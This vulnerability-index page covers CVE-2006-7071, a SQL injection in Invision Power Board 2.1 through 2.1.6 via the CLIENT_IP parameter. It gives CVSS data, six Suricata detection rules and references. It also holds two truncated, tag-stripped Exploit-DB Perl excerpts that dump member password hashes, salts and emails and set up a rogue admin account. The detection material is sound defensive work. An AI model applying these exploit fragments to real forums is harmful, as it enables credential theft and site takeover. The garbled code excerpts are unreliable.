CVE-2006-7071
Published: 2007-03-02
Priority: P339 · Severity: high · CVSS 2.0 base score: 7.5 · Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available · EPSS: 1.30% (66.8th percentile)
SQL injection vulnerability in classes/class_session.php in Invision Power Board (IPB) 2.1 up to 2.1.6 allows remote attackers to execute arbitrary SQL commands via the CLIENT_IP parameter.
Affected (6 ranges; the per-range version bounds are not given on this page):

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| invision_power_services | invision_power_board | — | — |
Suricata rules (Emerging Threats) indexed for this CVE. Each rule text is cut off at the end of its metadata field exactly as on the source page.

Suricata: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7071 [HIGH]

```
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UPDATE"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004802; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre
```

Suricata: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP ASCII
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7071 [HIGH]

```
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP ASCII"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004801; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
```

Suricata: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP INSERT
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7071 [HIGH]

```
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP INSERT"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004799; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
```

Suricata: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP DELETE
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7071 [HIGH]

```
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP DELETE"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004800; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
```

Suricata: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UNION SELECT
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7071 [HIGH]

```
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP UNION SELECT"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004798; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 202
```

Suricata: ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP SELECT
suricata · 2010-07-30 · CVSS 7.5 · CVE-2006-7071 [HIGH]

```
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Invision Power Board (IPB) SQL Injection Attempt -- class_session.php CLIENT_IP SELECT"; flow:established,to_server; http.uri; content:"/classes/class_session.php?"; nocase; content:"CLIENT_IP="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7071; reference:url,www.milw0rm.com/exploits/2010; classtype:web-application-attack; sid:2004797; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitr
```
Exploit-DB: Invision Power Board 2.1 < 2.1.6 - SQL Injection (2)
exploitdb · 2006-07-18 · CVE-2006-7071

Listing excerpt, truncated and with angle-bracketed text stripped, as on the source page:

```perl
Invision Power Board 2.1 new;
&header();
if (@ARGV ".$server."_result.txt");
for($id = 1; $id 0)
{
$email = $rep;
print RES $id.":".$hash.":".$salt."::".$email."\n";
}
}
}
}
close(RES);
print "[!] Query was successfully perfomed. Results are in txt files\r\n";
&footer();
$ex = ;
sub footer()
{
print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";
}
sub header()
{
print q(
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
* Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *
* Coded by w4g.not null *
* FOR EDUCATIONAL PURPOSES *ONLY* *
);
}
sub info()
{
print q(
[i] Usage: perl w4gipb216.pl [server] [/dir/]
where
|- server - server, where IPB installed without http://
|- /dir/ - dir, where IPB installed or / for no dir
e.g perl w
```
Exploit-DB: Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)
exploitdb · 2006-07-14 · CVE-2006-7071

Listing excerpt (Perl/Tk GUI), truncated and with angle-bracketed text stripped, as on the source page:

```perl
Invision Power Board 2.1 "r57ipb216gui" );
$mw->geometry ( '420x550' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Power Board 2.1.* '{Verdana} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://server/forum/index.php';
$user_id = '1';
$prefix = 'ibf_';
$table = 'members';
$column = 'member_login_key';
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = '[email protected]';
$report = '';
$group = 4;
$curr_user = 0;
$rand_session = &session();
$use_custom_fields = 0;
$custom_fields = 'name1=value1,name2=value2';
$fleft->Label ( -
```
No writeups or analysis indexed.
References:

- http://archives.neohapsis.com/archives/bugtraq/2006-07/0249.html
- http://rst.void.ru/download/r57ipb216gui.txt
- http://secunia.com/advisories/21072
- http://securityreason.com/securityalert/2325
- http://www.vupen.com/english/advisories/2006/2810
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27753
- https://www.exploit-db.com/exploits/2010